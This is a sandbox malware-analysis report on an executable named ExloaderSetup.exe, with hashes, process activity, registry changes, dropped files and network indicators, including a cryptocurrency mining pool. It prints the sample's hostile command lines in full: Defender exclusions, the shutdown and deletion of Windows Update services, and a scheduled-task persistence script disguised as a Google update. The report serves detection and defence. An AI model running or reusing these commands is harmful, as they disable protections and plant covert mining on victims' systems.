File name: | ExloaderSetup.exe |
Full analysis: | https://app.any.run/tasks/c523a187-bd85-45d5-b4b3-1a6872a41466 |
Verdict: | Malicious activity |
Analysis date: | April 01, 2023, 01:20:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
MD5: | 60F4D01E21F14E48AF9F2024D5A7AD59 |
SHA1: | FD60ACE5FEEA5D813DEEBC007C0E1933931982C5 |
SHA256: | 161C8B407D317897A6F55A2812EECBB1FE4E999156AE666933C9999F602AB81C |
SSDEEP: | 393216:VYvVgx3oBkGQsA33cmlCcUEGxkeq/OzxMpBt7sZxYL3of4m46:VwVgp6kGQfHcmlh6Keq/gMtQZxMo |
.exe | | | Win32 Executable (generic) (42.6) |
---|---|---|
.exe | | | Win16/32 Executable Delphi generic (19.5) |
.exe | | | Generic Win/DOS Executable (18.9) |
.exe | | | DOS Executable Generic (18.9) |
Subsystem: | Windows GUI |
---|---|
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x14d1 |
UninitializedDataSize: | - |
InitializedDataSize: | 19866624 |
CodeSize: | 2048 |
LinkerVersion: | 6 |
PEType: | PE32 |
ImageFileCharacteristics: | No relocs, Executable, No line numbers, No symbols, 32-bit, No debug |
TimeStamp: | 0000:00:00 00:00:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 01-Jan-1970 00:00:00 |
Detected languages: |
|
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 4 |
Time date stamp: | 01-Jan-1970 00:00:00 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x00000668 | 0x00000800 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 4.63988 |
.rdata | 0x00002000 | 0x012DE3A3 | 0x012DE400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 7.99907 |
.bss | 0x012E1000 | 0x00000004 | 0x00000000 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0 |
.rsrc | 0x012E2000 | 0x00013E40 | 0x00014000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 6.08668 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 4.88522 | 675 | UNKNOWN | English - United States | RT_MANIFEST |
2 | 2.20934 | 296 | UNKNOWN | English - United States | RT_ICON |
3 | 4.09612 | 3752 | UNKNOWN | English - United States | RT_ICON |
4 | 4.63458 | 2216 | UNKNOWN | English - United States | RT_ICON |
5 | 4.69609 | 1384 | UNKNOWN | English - United States | RT_ICON |
6 | 7.94794 | 28488 | UNKNOWN | English - United States | RT_ICON |
7 | 3.88767 | 16936 | UNKNOWN | English - United States | RT_ICON |
8 | 3.94179 | 9640 | UNKNOWN | English - United States | RT_ICON |
9 | 3.98176 | 6760 | UNKNOWN | English - United States | RT_ICON |
10 | 3.97877 | 4264 | UNKNOWN | English - United States | RT_ICON |
kernel32.dll |
msvcrt.dll |
shell32.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2000 | "C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe" | C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221226540 Modules
| |||||||||||||||
624 | "C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe" | C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
2264 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYwBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAeAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAeAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAZAB3ACMAPgA=" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | ExloaderSetup.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2604 | "C:\Users\admin\AppData\Local\Temp\Exloader.exe" | C:\Users\admin\AppData\Local\Temp\Exloader.exe | ExloaderSetup.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
2636 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2100 | "C:\Users\admin\AppData\Local\Temp\ExLoader_Installer.exe" | C:\Users\admin\AppData\Local\Temp\ExLoader_Installer.exe | ExloaderSetup.exe | ||||||||||||
User: admin Integrity Level: HIGH Modules
| |||||||||||||||
2532 | C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2548 | C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2596 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wqzjlkpym#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2080 | sc stop UsoSvc | C:\Windows\System32\sc.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (624) ExloaderSetup.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (624) ExloaderSetup.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (624) ExloaderSetup.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (624) ExloaderSetup.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (2636) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2636) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (2636) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (2636) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (2636) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\14C\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (2284) reg.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters |
Operation: | delete key | Name: | (default) |
Value: |
PID | Process | Filename | Type | |
---|---|---|---|---|
2100 | ExLoader_Installer.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\data\app.so | — | |
MD5:— | SHA256:— | |||
624 | ExloaderSetup.exe | C:\Users\admin\AppData\Local\Temp\Exloader.exe | executable | |
MD5:BDD0E41494E3ABEE1A2DD016452D61E8 | SHA256:D32C2F0FA93D76B269233EF6B081C135CB37B8C003C1589558CE206B9FC3E28C | |||
2636 | powershell.exe | C:\Users\admin\AppData\Local\Temp\pi0fug0c.beg.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2596 | powershell.exe | C:\Users\admin\AppData\Local\Temp\unlqrlve.kqy.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2636 | powershell.exe | C:\Users\admin\AppData\Local\Temp\cn4y33jb.r0w.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2100 | ExLoader_Installer.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\vcruntime140.dll | executable | |
MD5:11D9AC94E8CB17BD23DEA89F8E757F18 | SHA256:E1D6F78A72836EA120BD27A33AE89CBDC3F3CA7D9D0231AAA3AAC91996D2FA4E | |||
2596 | powershell.exe | C:\Users\admin\AppData\Local\Temp\lflpyyii.zpd.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2636 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
2100 | ExLoader_Installer.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\msvcp140.dll | executable | |
MD5:BF78C15068D6671693DFCDFA5770D705 | SHA256:A88B8C1C8F27BF90FE960E0E8BD56984AD48167071AF92D96EC1051F89F827FB | |||
624 | ExloaderSetup.exe | C:\Users\admin\AppData\Local\Temp\ExLoader_Installer.exe | executable | |
MD5:1B5F3670E124134F90FC6E7857DBA132 | SHA256:8116A5D5BB05E55F1B209D5C85A2A75A4F9DDC05E162F5EB44F45C709CE9E206 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2416 | powershell.exe | GET | 304 | 178.79.242.11:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?aa2654b7fc615776 | DE | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2416 | powershell.exe | 178.79.242.11:80 | ctldl.windowsupdate.com | LLNW | DE | suspicious |
2848 | ExLoader_Installer.exe | 204.79.197.200:443 | www.bing.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2848 | ExLoader_Installer.exe | 142.250.184.196:443 | www.google.com | GOOGLE | US | whitelisted |
2796 | dialer.exe | 162.19.139.184:12222 | xmr.2miners.com | OVH SAS | FR | suspicious |
2848 | ExLoader_Installer.exe | 212.82.100.137:443 | search.yahoo.com | Yahoo! UK Services Limited | IE | shared |
2848 | ExLoader_Installer.exe | 213.180.193.146:443 | meteum.ai | YANDEX LLC | RU | whitelisted |
2848 | ExLoader_Installer.exe | 13.107.21.200:443 | www.bing.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2796 | dialer.exe | 104.20.68.143:443 | pastebin.com | CLOUDFLARENET | — | malicious |
Domain | IP | Reputation |
---|---|---|
ctldl.windowsupdate.com |
| whitelisted |
search.yahoo.com |
| whitelisted |
www.google.com |
| whitelisted |
meteum.ai |
| unknown |
www.bing.com |
| whitelisted |
xmr.2miners.com |
| suspicious |
pastebin.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Crypto Currency Mining Activity Detected | ET INFO Observed DNS Query to Cryptocurrency Mining Pool Domain (xmr .2miners .com) |